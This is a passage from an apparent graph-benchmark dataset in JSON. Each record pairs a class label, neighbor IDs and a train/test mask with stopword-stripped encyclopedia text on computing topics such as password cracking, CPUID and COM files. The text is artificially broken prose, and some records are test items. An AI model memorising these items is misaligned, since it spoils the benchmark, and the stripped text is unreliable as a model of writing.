    "text": "X704:x704 x704 microprocessor implements 32-bit version powerpc instruction set architecture isa developed exponential technology microprocessor notable high clock frequency time circa 1997 range 400 533 mhz use bipolar transistors logic cmos circuits memory failure see use apple macintosh opposite industry observers microprocessor report expected exponential technology eventually failed result x704 lack success former employees founded intrinsity start-up developed high clock frequency mips implementation fastmath company left microprocessor business licenses fast14 dynamic logic third parties ati gpus x704 superscalar microprocessor issued three instructions per cycle arithmetic logic unit alu floating-point unit fpu branch unit realize short cycle times caches kept small limiting performance three levels cache first consisted separate 2 kb instruction data caches direct-mapped l2 cache on-die 32 kb large eight-way set set-associative l3 cache larger supporting capacities 512 kb 2 mb located externally x704 contained 2.7 million transistors 0.7 million bipolar transistors 2.0 million metal oxide semiconductor mos measured 15 mm 10 mm 150 mm fabricated 0.5 µm bicmos process six levels interconnect used 3.6 2.1 v power supplies dissipated less 85 w 533 mhz x704 packaged 356-ball ball grid array bga",
    "neighbors": [
      4868,
      10501,
      3846,
      4743,
      6663,
      5642,
      1548,
      1933,
      3472,
      4881,
      7065,
      1563,
      1309,
      6815,
      3493,
      6949,
      6311,
      8102,
      1321,
      9391,
      10543,
      4017,
      5297,
      1461,
      8120,
      6715,
      9020,
      1725,
      1983,
      1985,
      7234,
      10180,
      336,
      8530,
      3540,
      342,
      9302,
      11613,
      6878,
      1635,
      8931,
      869,
      10214,
      10985,
      5358,
      3185,
      4465,
      4211,
      5235,
      8058,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 6915,
    "label": 9,
    "text": "WWF_(file_format):wwf file format wwf modification open standard pdf format document exchange endorsed world wide fund nature also abbreviated wwf germany wwf format promoted environmentally friendly comparable document exchange formats e.g pdf doc since documents format designed difficult print motivation behind use format prevent unnecessary printing documents website claims file format able read programs open ordinary pdf files present software creating wwf files available mac os x 10.4 windows xp later open source equivalent available linux windows xp later wwf files simply pdf files security settings printing set allowed file extension .wwf thus inability print files comes drm built adobe reader looks flag pdf see whether printing allowed pdf readers ghostscript may honour no-print flag rendering wwf files printable initiative criticised restricting users rights ineffective non-adobe readers ghostscript print documents format violating bsd license incompatible goals free open source software movement software contacting wwf without user consent criticised wwf international director corporate relations maria boulos misleading launched global product despite created wwf german division without consultation wwf international",
    "neighbors": [
      10352,
      8627,
      8797,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 6916,
    "label": 4,
    "text": "Password_cracking:password cracking cryptanalysis computer security password cracking process recovering passwords data stored transmitted computer system common approach brute-force attack try guesses repeatedly password check available cryptographic hash password purpose password cracking might help user recover forgotten password installing entirely new password less security risk involves system administration privileges gain unauthorized access system preventive measure system administrators check easily crackable passwords file-by-file basis password cracking utilized gain access digital evidence judge allowed access particular file access restricted time crack password related bit strength see password strength measure password entropy details password stored methods password cracking require computer produce many candidate passwords checked one example brute-force cracking computer tries every possible key password succeeds common methods password cracking dictionary attacks pattern checking word list substitution etc attempt reduce number trials required usually attempted brute force higher password bit strength exponentially increases number candidate passwords must checked average recover password reduces likelihood password found cracking dictionary ability crack passwords using computer programs also function number possible passwords per second checked hash target password available attacker number billions trillions per second since offline attack possible rate depends whether authentication software limits often password tried either time delays captchas forced lockouts number failed attempts another situation quick guessing possible password used form cryptographic key cases attacker quickly check see guessed password successfully decodes encrypted data kinds password hash ordinary desktop computers test hundred million passwords per second using password cracking tools running general purpose cpu billions passwords per second using gpu-based password cracking tools see john ripper benchmarks rate password guessing depends heavily cryptographic function used system generate password hashes suitable password hashing function bcrypt many orders magnitude better naive function like simple md5 sha user-selected eight-character password numbers mixed case symbols commonly selected passwords dictionary matches filtered reaches estimated 30-bit strength according nist 2 one billion permutations would cracked seconds hashing function naive ordinary desktop computers combined cracking effort done botnets capabilities password cracking considerably extended 2002 distributed.net successfully found 64-bit rc5 key four years effort included 300,000 different computers various times generated average 12 billion keys per second graphics processors speed password cracking factor 50 100 general purpose computers 2011 available commercial products claim ability test 2,800,000,000 passwords second standard desktop computer using high-end graphics processor device crack 10 letter single-case password one day work distributed many computers additional speedup proportional number available computers comparable gpus emergence hardware acceleration past decade gpu resources used increase efficiency speed brute force attack 2012 stricture consulting group unveiled 25-gpu cluster achieved brute force attack speed 350 billion guesses per second allowing check formula_1password combinations 5.5 hours using ocl-hashcat plus virtual opencl cluster platform linux-based gpu cluster used crack 90 percent 6.5 million password hashes belonging users linkedin despite capabilities desktop cpus slower cracking passwords purpose-built password breaking machines 1998 electronic frontier foundation eff built dedicated password cracker using asics opposed general purpose cpus machine deep crack broke des 56-bit key 56 hours testing 90 billion keys per second 2010 georgia tech research institute developed method using gpgpu crack passwords coming minimum secure password length 12 characters passwords difficult remember reduce security system users might need write electronically store password using insecure method b users need frequent password resets c users likely re-use password similarly stringent requirements password strength e.g mix uppercase lowercase letters digits change monthly greater degree users subvert system memorability security passwords jeff yan et al examines effect advice given users good choice password found passwords based thinking phrase taking first letter word memorable naively selected passwords hard crack randomly generated passwords combining two unrelated words another good method personally designed algorithm generating obscure passwords another good method however asking users remember password consisting mix uppercase lowercase characters similar asking remember sequence bits hard remember little bit harder crack e.g 128 times harder crack 7-letter passwords less user simply capitalizes one letters asking users use letters digits often lead easy-to-guess substitutions e → 3 → 1 substitutions well known attackers similarly typing password one keyboard row higher common trick known attackers research detailed april 2015 paper several professors carnegie mellon university shows people choices password structure often follow several known patterns result passwords may much easily cracked mathematical probabilities would otherwise indicate passwords containing one digit example disproportionately include end password july 16 1998 cert reported incident attacker found 186,126 encrypted passwords time discovered already cracked 47,642 passwords december 2009 major password breach rockyou.com website occurred led release 32 million passwords attacker leaked full list 32 million passwords identifiable information internet passwords stored cleartext database extracted sql injection vulnerability imperva application defense center adc analysis strength passwords june 2011 nato north atlantic treaty organization experienced security breach led public release first last names usernames passwords 11,000 registered users e-bookshop data leaked part operation antisec movement includes anonymous lulzsec well hacking groups individuals july 11 2011 booz allen hamilton large american consulting firm substantial amount work pentagon servers hacked anonymous leaked day leak dubbed 'military meltdown monday includes 90,000 logins military personnel—including personnel uscentcom socom marine corps various air force facilities homeland security state department staff looks like private sector contractors leaked passwords wound hashed unsalted sha-1 later analyzed adc team imperva revealing even military personnel used passwords weak 1234 july 18 2011 microsoft hotmail banned password 123456 july 2015 group calling impact team stole user data ashley madison many passwords hashed using relatively strong bcrypt algorithm weaker md5 hash attacking latter algorithm allowed 11 million plaintext passwords recovered best method preventing password cracked ensure attackers get access even hashed password example unix operating system hashed passwords originally stored publicly accessible file /etc/passwd modern unix similar systems hand stored shadow password file /etc/shadow accessible programs running enhanced privileges i.e. system privileges makes harder malicious user obtain hashed passwords first instance however many collections password hashes stolen despite protection another strong approach combine site-specific secret key password hash prevents plaintext password recovery even hashed values purloined third approach use key derivation functions reduce rate passwords guessed unfortunately many common network protocols transmit passwords cleartext use weak challenge/response schemes modern unix systems replaced traditional des-based password hashing function crypt stronger methods bcrypt scrypt systems also begun adopt methods instance cisco ios originally used reversible vigenère cipher encrypt passwords uses md5-crypt 24-bit salt enable secret command used newer methods use large salt values prevent attackers efficiently mounting offline attacks multiple user accounts simultaneously algorithms also much slower execute drastically increases time required mount successful offline attack many hashes used storing passwords md5 sha family designed fast computation efficient implementation hardware result ineffective preventing password cracking especially methods like rainbow tables using key stretching algorithms pbkdf2 form password hashes significantly reduce rate passwords tested solutions like security token give formal proof answer constantly shifting password solutions abruptly reduce timeframe brute forcing attacker needs break use password within single shift reduce value stolen passwords short time validity 2013 long-term password hashing competition announced choose new standard algorithm password hashing many password cracking software tools popular aircrack cain abel john ripper hashcat hydra davegrohl elcomsoft many litigation support software packages also include password cracking functionality packages employ mixture cracking strategies algorithm brute force dictionary attacks proving productive increased availability computing power beginner friendly automated password cracking software number protection schemes allowed activity taken script kiddies",
    "neighbors": [
      7426,
      7556,
      7557,
      519,
      11144,
      5003,
      9356,
      3984,
      1683,
      4500,
      1941,
      3477,
      4883,
      9214,
      10135,
      2716,
      9762,
      10107,
      10658,
      7337,
      7465,
      4140,
      7983,
      9855,
      9393,
      10110,
      10801,
      7994,
      9791,
      8513,
      2430,
      8514,
      8135,
      7624,
      6345,
      10959,
      3282,
      1491,
      4435,
      8787,
      6363,
      4956,
      733,
      10332,
      8032,
      3937,
      9319,
      1387,
      8827,
      5492,
      6779,
      10492,
      9085,
      2558,
      3711
    ],
    "mask": "None"
  },
  {
    "node_id": 6917,
    "label": 4,
    "text": "Browser_isolation:browser isolation browser isolation cybersecurity model aims physically isolate internet user browsing activity associated cyber risks away local networks infrastructure browser isolation technologies approach model different ways seek achieve goal effective isolation web browser user browsing activity method securing web browsers browser-based security exploits well web-borne threats ransomware malware browser isolation technology delivered customers cloud hosted service known remote browser isolation rbi model enables organizations deploy browser isolation solution users without managing associated server infrastructure also client side approaches browser isolation based client-side hypervisors depend servers order isolate users browsing activity associated risks instead activity virtually isolated local host machine client-side solutions break security physical isolation model allow avoid server overhead costs associated remote browser isolation solutions browser isolation white paper includes high level overview browser isolation cybersecurity concept explains differences client server side browser isolation models architectures browser isolation typically leverages virtualization containerization technology isolate users web browsing activity away endpoint device significantly reducing attack surface rogue links files browser isolation way isolate web browsing hosts high-risk behaviors away mission-critical data infrastructure browser isolation process physically isolate users browsing activity away local networks infrastructure isolating malware browser based cyber-attacks process 2017 american research group gartner identified remote browser browser isolation one top technologies security gartner report also forecast 50 enterprises would actively begin isolate internet browsing reduce impact cyber attacks coming three years similar research conducted transparency market research shows remote browser isolation market projected reach us 5079.8 end 2025 expanding exceptional cagr 19.6 according market research media remote browser isolation rbi market forecast reach 10 billion 2024 growing cagr 30 period 2019-2024 unlike traditional web security approaches antivirus software secure web gateways browser isolation zero trust approach rely filtering content based known threat patterns signatures traditional approaches ca n't handle 0-day attacks since threat patterns unknown rather browser isolation approach treats websites web content explicitly whitelisted untrusted isolates local device virtual environment container virtual machine web-based files rendered remotely end users access within browser without downloading alternatively files sanitized within virtual environment using file cleansing technologies content disarm reconstruction cdr allowing secure file downloads user device typically browser isolation solutions provide users 'disposable non-persistent browser environments browsing session closed times entire browser environment reset known good state simply discarded malicious code encountered session thus prevented reaching endpoint persisting within network regardless whether threat detected way browser isolation proactively combats known unknown zero-day threats effectively complementing security measures contributing defense-in-depth layered approach web security browser isolation began evolution 'security physical isolation cybersecurity model also known air-gap model security professionals physically isolating critical networks users infrastructures cybersecurity purposes decades although techniques breach 'air-gapped systems exist typically require physical access close proximity air-gapped system order effective use air-gap makes infiltration systems public internet extremely difficult impossible without physical access system first commercial browser isolation platforms leveraged national nuclear security administration lawrence livermore national laboratory los alamos national laboratory sandia national laboratories 2009 browser isolation platforms based virtualization used deliver non-persistent virtual desktops thousands federal government users june 2018 defense information systems agency disa announced request information cloud-based internet isolation solution part endpoint security portfolio rfi puts “ service would redirect act internet browsing end user ’ desktop remote server external department defense information network. ” time rfi largest known project browser isolation seeking cloud based service leveraging concurrent simultaneous use licenses ~60 total user base 3.1 million users",
    "neighbors": [
      4194,
      8574,
      2213,
      3944,
      1970,
      7515,
      2135,
      3643,
      8094
    ],
    "mask": "Test"
  },
  {
    "node_id": 6918,
    "label": 2,
    "text": "Virtuozzo_(company):virtuozzo company virtuozzo privately held software company specializing virtualization software divested parallels company 2016 virtuozzo developed first commercially available operating system-level virtualization container technology 2000 open-sourced 2005 form openvz company founded 1997 name swsoft maintained headquarters herndon virginia additional offices throughout north america europe asia research development offices located moscow russia sales offices germany singapore january 2002 virtuozzo 2.0 containers virtualization solution released 2003 swsoft acquired makers plesk web hosting products expanded presence germany novosibirsk russia december 2007 acquisition parallels inc. swsoft company announced plans change name parallels distribute products parallels brand name december 2015 virtuozzo spun became standalone company lead entrepreneur former parallels exec rob lovell may 2016 virtuozzo announced intention join open container initiative plans develop dedicated cloud-based servers well specialized linux distribution month virtuozzo launched virtuozzo application catalog developed partnership bitnami virtuozzo announced strategic partnership jelastic august 2016 produce virtuozzo devops application orchestration platform aimed mid large size companies company named george karidis ceo november 2016 karidis previously headed cloud business unit compucom april 2017 virtuozzo partnered packet.net distribute virtuozzo software packet virtuozzo operating system-level server virtualization solution designed centralize server management consolidate workloads reducing number physical servers required organizations use virtuozzo server consolidation disaster recovery server workload agility virtuozzo generate virtual machine host os like traditional vm software instead creates isolated virtual private servers vpss single physical server instance software run multiple linux vpss linux windows time server vps performs exactly like stand-alone server rebooted independently virtuozzo linux became available 2001 version supports 32- 64-bit microprocessors became available 2005 2002 virtuozzo proved 2.5 version software could run 2,500 instances red hat linux eight-processor dell server result intel partnered virtuozzo 2002 develop partitioning technology ia-64 processors linux architectures support virtuozzo linux x86 ia64 amd64 em64t itanium virtuozzo linux enables multiple linux distributions exist simultaneously one server based openvz linux-based os-level virtualization technology allows physical server run multiple isolated operating system instances 2005 company updated virtuozzo support 64-bit x86 processors virtuozzo requires least pentium iii server least 1 gb memory 4 gb available hard drive virtuozzo ’ management tools compatible microsoft ’ viridian virtual server software virtuozzo container staging processed company container platform openvz virtuozzo 7 incorporated optimized kernel-based virtual machine released july 2016 2012 company released virtuozzo storage targeted container storage second version virtuozzo storage released 2017",
    "neighbors": [
      8986,
      318,
      295
    ],
    "mask": "Test"
  },
  {
    "node_id": 6919,
    "label": 9,
    "text": "*Lisp:*lisp time connection machine designed built language actively developed assembly-level language named paris par allel nstruction et became evident better way program machine needed quickly waiting completion connection machine lisp cm lisp implementation high-level programming language lisp parallel computing extensions option cm lisp proposed danny hillis development expected continue several years *lisp interpreter initially developed became apparent quickly *lisp compiler translating *lisp lisp paris would needed attain gigaflops speed attainable theory connection machine *lisp compiler written jeff mincy first released 1986 application achieving two gigaflops helicopter wake simulator developed alan egolf employee united technologies j. p. massar thinking machines employee 1987 *lisp simulator emulator meant run *lisp code standard non-parallel machines developed time j. p. massar simulator still exists ported american national standards institute ansi common lisp cl 2001 older version written original cl exists carnegie mellon university cmu artificial intelligence ai repository later versions *lisp involving significant upgrades functions performance worked cliff lasser jeff mincy j. p. massar 1989 *lisp implemented thinking machines cm5 circa 1990–1991 j. p. massar mario bourgoin starlisp written common lisp cl thus full power cl behind use connection machine one needed host front-end use *lisp front-end run cl symbolics machines using genera sun microsystems workstations running lucid inc. lucid common lisp used operate *lisp starlisp operated p arallel var iable pvars represented connection machine memory essentially vectors one element per cm processor virtual processor starlisp consisted standard operations pvars like vector addition multiplication along communication primitives essentially reordered elements pvar using cm communication hardware optimally route data",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      7805,
      9345,
      1159,
      9865,
      9877,
      4770,
      5803,
      2225,
      6840,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      3336,
      10510,
      1301,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      9665,
      4550,
      11218,
      10712,
      3034,
      477,
      3051,
      5611,
      9714,
      7670,
      11255
    ],
    "mask": "None"
  },
  {
    "node_id": 6920,
    "label": 1,
    "text": "Starcounter:starcounter starcounter in-memory application platform built starcounter ab platform based combined in-memory database engine application server combined in-memory database engine application server keeps data one place technology called virtual machine database management system vmdbms patent related technology explains way system environment configured maintain database objects database memory within environment memory application executes application memory within environment memory upon instantiation database object application environment allocates memory database database object database providing master storage database object tables classes consequence vmdbms lets application database virtual memory space implication object-relational mapper orm instead database directly accessed using sql-like queries called newsql application code major drawback in-memory databases main memory volatile therefore ensure durability solution starcounter utilizes write transaction logs disk way done traditional sql databases data needs recovered possible going back transaction logs database maintains acid compliance using transactional scope transactional memory allows long-running transactions nested transactions parallel transactions starcounter uses model-view-viewmodel mvvm pattern view model hosted server server-side code written using c since platform making use .net framework communication client server done using thin client library sends json-patches recommended way build view starcounter applications use html css polymer web components little logic possible client side starcounter likened oracle timesten in-memory database sap hana common based in-memory technology often targeted towards customers use real-time applications main difference way database management system integrated sap hana makes use column-oriented database management system timesten hand uses relational database management system rdbms starcounter unique uses object-oriented approach integrated application vmdbms underlying rdmbs starcounter ab established started development starcounter 2006 received 1.8 million funding vc round led industrifonden 2015 continue development starcounter 2.0 beta version bundles web application framework database released august 2013 starcounter ab named cool vendor in-memory computing technologies 2015 gartner september 2017 starcounter ab took 35 million sek funding existing investors anonymous investor also september 2017 starcounter ab 2.2 million euro prize competition sme instrument open disruptive innovation scheme organized horizon 2020 starcounter used enterprise installations supply chain management application used swedish superstore gekås ullared",
    "neighbors": [
      10048,
      8871,
      4045,
      4781,
      7983,
      9467,
      10413,
      3219,
      11539,
      3573,
      2901,
      7767,
      8923,
      4604,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 6921,
    "label": 2,
    "text": "COM_file:com file com file type simple executable file digital equipment operating systems 1970s codice_1 used filename extension text files containing commands issued operating system similar batch file introduction cp/m microcomputer operating system type files commonly associated com extension changed executable files convention later carried dos even complemented general exe file format executables compact com files remained viable frequently used dos codice_1 file name extension relation .com commercial top-level internet domain name however similarity name exploited malicious computer virus writers com format original binary executable format used cp/m including scp msx-dos well dos simple header exception cp/m 3 files contains standard metadata code data simplicity exacts price binary maximum size 65,280 ff00h bytes 256 bytes short 64 kb stores code data one segment since lacks relocation information loaded operating system pre-set address offset 0100h immediately following psp executed hence limitation executable size entry point fixed 0100h issue 8-bit machines since address 64k memory max 16-bit machines much larger address space format fell use intel 8080 cpu architecture 65,536 bytes memory could addressed address range 0000h ffffh cp/m first 256 bytes memory 0000h 00ffh reserved system use zero page user program loaded exactly 0100h executed com files fit model perfectly introduction mp/m concurrent cp/m possibility running one program command time program loaded 0100h run although file format dos cp/m .com files two operating systems compatible dos com files contain x86 instructions possibly dos system calls cp/m com files contain 8080 instructions cp/m system calls programs restricted certain machines could also contain additional instructions 8085 z80 .com files dos set x86 segment registers value sp stack pointer register fffeh thus stack begins top memory segment works original dos 1.x api derivative cp/m api program termination .com file would performed calling int 20h terminate program function else int 21h function 0 served purpose programmer also ensure code data segment registers contained value program termination avoid potential system crash although could used dos version microsoft recommended use int 21h function 4ch program termination dos 2.x onward require data code segment set value possible make .com file run operating systems form fat binary true compatibility instruction level instructions entry point chosen equal functionality different operating systems make program execution jump section operating system use basically two different programs functionality single file preceded code selecting one use cp/m 3 first byte com file c9h 256-byte header since c9h corresponds 8080 instruction codice_3 means com file immediately terminate run earlier version cp/m support extension instruction sets 8085 z80 supersets 8080 instruction set works three processors c9h invalid opcode 8088/8086 cause processor-generated interrupt 6 exception v86 mode 386 later x86 chips since c9h opcode leave since 80188/80186 therefore used first instruction valid program executable loader versions dos rejects com files start c9h avoiding crash files may names ending .com simple format described indicated magic number start file example command.com file dr dos 6.0 actually dos executable format indicated first two bytes mz 4dh 5ah initials mark zbikowski dos memory management provided com files loader execution environment memory simply available com file execution operating system command shell command.com reloaded leaves possibilities com file either simple using single segment arbitrarily complex providing memory management system example complex program command.com dos shell provided loader load com exe programs .com system larger programs available memory size loaded run system loader assumes code data first segment .com program provide organization programs larger available memory large data segments handled dynamic linking necessary code included .com program advantage using .com rather .exe format binary image usually smaller easier program using assembler compilers linkers sufficient power became available longer advantageous use .com format complex programs format still executable many modern windows nt-based platforms run ms-dos-emulating subsystem ntvdm present 64-bit variants com files executed also dos emulators dosbox platform supported emulators windows nt-based operating systems use .com extension small number commands carried ms-dos days although fact presently implemented .exe files operating system recognize .exe file header execute correctly despite technically incorrect .com extension fact .exe file renamed .com still execute correctly use original .com extensions commands ensures compatibility older dos batch files may refer full original filenames commands codice_4 codice_5 codice_6 codice_7 codice_8 codice_9 dos directory contains com file exe file name extension specified com file preferentially selected execution example directory system path contains two files named codice_10 codice_11 following would execute codice_10 user wishing run codice_11 explicitly use complete filename taking advantage default behaviour virus writers malicious programmers used names like codice_14 creations hoping placed directory corresponding exe file command batch file may accidentally trigger program instead text editor codice_15 .com files may fact contain .exe format executable windows nt derivatives windows 2000 windows xp windows vista windows 7 pathext variable used override order preference acceptable extensions calling files without specifying extension command line default value still places codice_16 files codice_17 files closely resembles feature previously found jp software line extended command line processors 4dos 4os2 4nt computer virus writers hoped take advantage modern computer users likely lack knowledge .com file extension associated binary format along likely familiarity .com internet domain name e-mails sent attachment names similar www.example.com unwary microsoft windows users clicking attachment would expect begin browsing site named codice_18 instead would run attached binary command file named codice_19 giving full permission machine whatever author mind nothing malicious com file format exploitation coincidental name collision .com com mand files .com com mercial web sites",
    "neighbors": [
      10113,
      1922,
      4870,
      8966,
      6664,
      8715,
      9996,
      6797,
      3216,
      8976,
      2322,
      7317,
      2840,
      2201,
      7323,
      1952,
      37,
      2729,
      7849,
      11562,
      6829,
      7983,
      5425,
      178,
      7986,
      5557,
      9525,
      4409,
      3386,
      7739,
      7999,
      4674,
      2627,
      4548,
      8517,
      4424,
      5065,
      6730,
      9166,
      3410,
      10067,
      6868,
      477,
      10083,
      5220,
      1253,
      8037,
      4712,
      621,
      8301,
      2672,
      3056,
      4337,
      499,
      2804,
      9329,
      4727,
      11513,
      6778,
      2942,
      8959
    ],
    "mask": "Test"
  },
  {
    "node_id": 6922,
    "label": 8,
    "text": "MnoGoSearch:mnogosearch mnogosearch open-source search engine unix-like computer systems written c. distributed gnu general public license designed organize search within website group websites intranet local system mnogosearch index text/plain text/html text/xml data natively many others datatypes using external parsers engine ready index multilingual websites wide range character sets languages supported detected automatically uses content negotiation technology fetch versions page different languages perform diacritic-insensitive search segment phrases chinese japanese thai possible use synonyms ispell-based fuzzing extend search results results sorted relevance last modified time title windows version mnogosearch features graphical user interface sold commercial license march 2019 software longer maintained available",
    "neighbors": [
      113,
      5612,
      2045,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 6923,
    "label": 3,
    "text": "The_Activision_Decathlon:activision decathlon activision decathlon sports game written david crane atari 2600 published activision 1983 ported atari 8-bit family atari 5200 commodore 64 colecovision msx platforms four players compete ten different events real-life decathlon either sequence individually game became somewhat notorious amount wear damage inflicted upon console controllers namely atari 2600 version rapid back-and-forth movement joystick propels athlete track game later reissued simply decathlon uk budget label firebird subsequently featured playstation 2 compilation activision anthology atari 2600 version decathlon reviewed video magazine arcade alley column described absolute triumph imaginative programming masterwork",
    "neighbors": [
      10316,
      9006,
      10695
    ],
    "mask": "None"
  },
  {
    "node_id": 6924,
    "label": 3,
    "text": "CPUID:cpuid codice_1 instruction identified codice_1 opcode processor supplementary instruction name derived cpu identification x86 architecture allowing software discover details processor introduced intel 1993 introduced pentium sl-enhanced 486 processors program use codice_1 determine processor type whether features mmx/sse implemented prior general availability codice_1 instruction programmers would write esoteric machine code exploited minor differences cpu behavior order determine processor make model outside x86 family developers mostly still required use esoteric processes involving instruction timing cpu fault triggers determine variations cpu design present motorola 680x0 family -- never cpuid instruction kind -- certain specific instructions required elevated privileges could used tell various cpu family members apart 68000 offered unprivileged move sr 2 different cpus could told apart cpu error condition triggered codice_1 instruction specific x86 architecture architectures like arm often provide on-chip registers read prescribed ways obtain sorts information provided x86 cpuid instruction codice_1 opcode 0fh a2h two bytes a20fh single word assembly language codice_1 instruction takes parameters codice_1 implicitly uses eax register determine main category information returned intel recent terminology called cpuid leaf codice_1 called codice_10 first store eax register highest eax calling parameter leaf cpu implements obtain extended function information codice_1 called significant bit eax set determine highest extended function calling parameter call codice_1 codice_13 cpuid leaves greater 3 less 80000000 accessible model-specific registers ia32_misc_disable.boot_nt4 bit 22 0 default name suggests windows nt4 boot properly unless bit set later versions windows need basic leaves greater 4 assumed visible current windows systems basic valid leaves go 14h information returned leaves disclosed publicly available documentation i.e reserved recently added leaves also sub-leaves selected via ecx register calling cpuid returns cpu manufacturer id string twelve-character ascii string stored ebx edx ecx order highest basic calling parameter largest value eax set calling codice_1 returned eax list processors highest function implemented following known processor manufacturer id strings following known id strings virtual machines instance genuineintel processor values returned ebx 0x756e6547 edx 0x49656e69 ecx 0x6c65746e following code written gnu assembler x86-64 architecture displays vendor id string well highest calling parameter cpu implements returns cpu stepping model family information register eax also called signature cpu feature flags registers edx ecx additional feature info register ebx processor info feature flags manufacturer specific usually intel values used manufacturers sake compatibility reserved fields masked using processor identification purposes returns list descriptors indicating cache tlb capabilities eax ebx ecx edx registers returns processor serial number processor serial number introduced intel pentium iii due privacy concerns feature longer implemented later models psn feature bit always cleared transmeta efficeon crusoe processors also provide feature amd cpus however implement feature cpu models intel pentium iii cpus serial number returned edx ecx registers transmeta efficeon cpus returned ebx eax registers transmeta crusoe cpus returned ebx register note processor serial number feature must enabled bios setting order function two leaves used processor topology thread core package cache hierarchy enumeration intel multi-core hyperthreaded processors amd use leaves alternate ways core enumeration unlike cpuid leaves leaf bh return different values edx depending logical processor cpuid instruction runs value returned edx actually x2apic id logical processor x2apic id space continuously mapped logical processors however gaps mapping meaning intermediate x2apic ids n't necessarily correspond logical processor additional information mapping x2apic ids cores provided registers although leaf bh sub-leaves selected ecx described value returned edx affected logical processor instruction running subleaf processor topology exposed leaf bh hierarchical one strange caveat order logical levels hierarchy n't necessarily correspond order physical hierarchy smt/core/package however every logical level queried ecx subleaf bh leaf correspondence level type either smt core invalid level id space starts 0 continuous meaning level id invalid higher level ids also invalid level type returned bits 15:08 ecx number logical processors level queried returned ebx finally connection levels x2apic ids returned eax 4:0 number bits x2apic id must shifted order obtain unique id next level example dual-core westmere processor capable hyperthreading thus two cores four threads total could x2apic ids 0 1 4 5 four logical processors leaf bh =eax subleaf 0 =ecx cpuid could instance return 100h ecx meaning level 0 describes smt hyperthreading layer return 2 ebx two logical processors smt units per physical core value returned eax 0-subleaf 1 case shifting aforementioned x2apic ids right one bit gives unique core number next level level id hierarchy erases smt id bit inside core simpler way interpret information last bit bit number 0 x2apic id identifies smt/hyperthreading unit inside core example advancing subleaf 1 making another call cpuid eax=bh ecx=1 could instance return 201h ecx meaning core-type level 4 ebx 4 logical processors package eax returned could value greater 3 happens bit number 2 used identify core x2apic id note bit number 1 x2apic id used example however eax returned level could well 4 happens clarkdale core i3 5x0 also gives unique id package level =0 obviusly shifting x2apic id 4 bits finally may wonder eax=4 leaf tell us n't find already eax 31:26 returns apic mask bits reserved package would 111b example bits 0 2 used identifying logical processors inside package bit 1 also reserved although used part logical processor identification scheme words apic ids 0 7 reserved package even though half values n't map logical processor cache hierarchy processor explored looking sub-leaves leaf 4 apic ids also used hierarchy convey information different levels cache shared smt units cores continue example l2 cache shared smt units core physical cores westmere indicated eax 26:14 set 1 information l3 cache shared whole package indicated setting bits least 111b cache details including cache type size associativity communicated via registers leaf 4 beware older versions intel app note 485 contain misleading information particularly respect identifying counting cores multi-core processor errors misinterpreting information even incorporated microsoft sample code using cpuid even 2013 edition visual studio also sandpile.org page cpuid intel code sample identifying processor topology correct interpretation current intel software developer ’ manual clear language open source cross-platform production code wildfire games also implements correct interpretation intel documentation topology detection examples involving older pre-2010 intel processors lack x2apic thus n't implement eax=bh leaf given 2010 intel presentation beware using older detection method 2010 newer intel processors may overestimate number cores logical processors old detection method assumes gaps apic id space assumption violated newer processors starting core i3 5x0 series newer processors also come x2apic topology correctly determined using eax=bh leaf method returns extended feature flags ebx ecx edx highest calling parameter returned eax returns extended feature flags edx ecx amd feature flags follows return processor brand string eax ebx ecx edx codice_1 must issued parameter sequence get entire 48-byte null-terminated ascii processor brand string necessary check whether feature present cpu issuing codice_1 codice_13 first checking returned value greater equal 80000004h function contains processor ’ l1 cache tlb characteristics returns details l2 cache ecx including line size bytes type associativity encoded 4 bits cache size function provides advanced power management feature identifiers returns largest virtual physical address sizes eax bits 07-00 physical address bits bits 15-8 linear address bits bits 31-16 reserved 0 could used hypervisor virtual machine system report physical/virtual address sizes possible virtual cpu specific amd k7 k8 cpus returns string hammer time eax ebx ecx edx information easy access languages well instance c code gcc prints first five values returned cpuid generally useful c implementation works 32- 64-bit systems gcc also provides header called codice_18 systems cpuid codice_19 macro expanding inline assembly typical usage would one requested extended feature present cpu would notice might get random unexpected results safer version also provided codice_18 checks extended features safety checks output values passed using reference-like macro parameters conventional pointers notice ampersands codice_21 conditional statement codice_22 call receives correct request return non-zero value fails zero microsoft visual c compiler builtin function codice_23 cpuid instruction may embedded without using inline assembly handy since x86-64 version msvc allow inline assembly program msvc would borland/embarcadero c compilers bcc32 native asm function calls necessary asm implementation pseudo code many interpreted compiled scripting languages capable using cpuid via ffi library one implementation shows usage ruby ffi module execute assembly language includes cpuid opcode non-x86 cpu architectures also provide certain forms structured information processor abilities commonly set special registers dsp transputer-like chip families taken instruction noticeable way spite relative terms many variations design alternate ways silicon identification might present example dsps texas instruments contain memory-based register set functional unit starts identifiers determining unit type model asic design revision features selected design phase continues unit-specific control data registers access areas performed simply using existing load store instructions thus devices need extending register set device identification purposes according note former intel app note 485 specifically cpuid incorporated intel® 64 ia-32 architectures software developer ’ manual manual however still directs reader app note 485 information latest published version app note 485 dating may 2012 available via archive.org app note 485 contains information easily misinterpreted though particularly respect big intel manuals tend lag behind intel isa document available top page updated even processors yet publicly available thus usually contains cpuid bits example writing isa book revision 19 dated may 2014 documents clflushopt bit leaf 7 big manuals although apparently up-to-date revision 51 dated june 2014 n't mention",
    "neighbors": [
      7173,
      6150,
      6151,
      6153,
      8716,
      5655,
      2073,
      27,
      8231,
      2088,
      3630,
      7218,
      1085,
      7234,
      3142,
      6730,
      4695,
      8795,
      2655,
      1122,
      7783,
      1137,
      5234,
      8322,
      4237,
      7313,
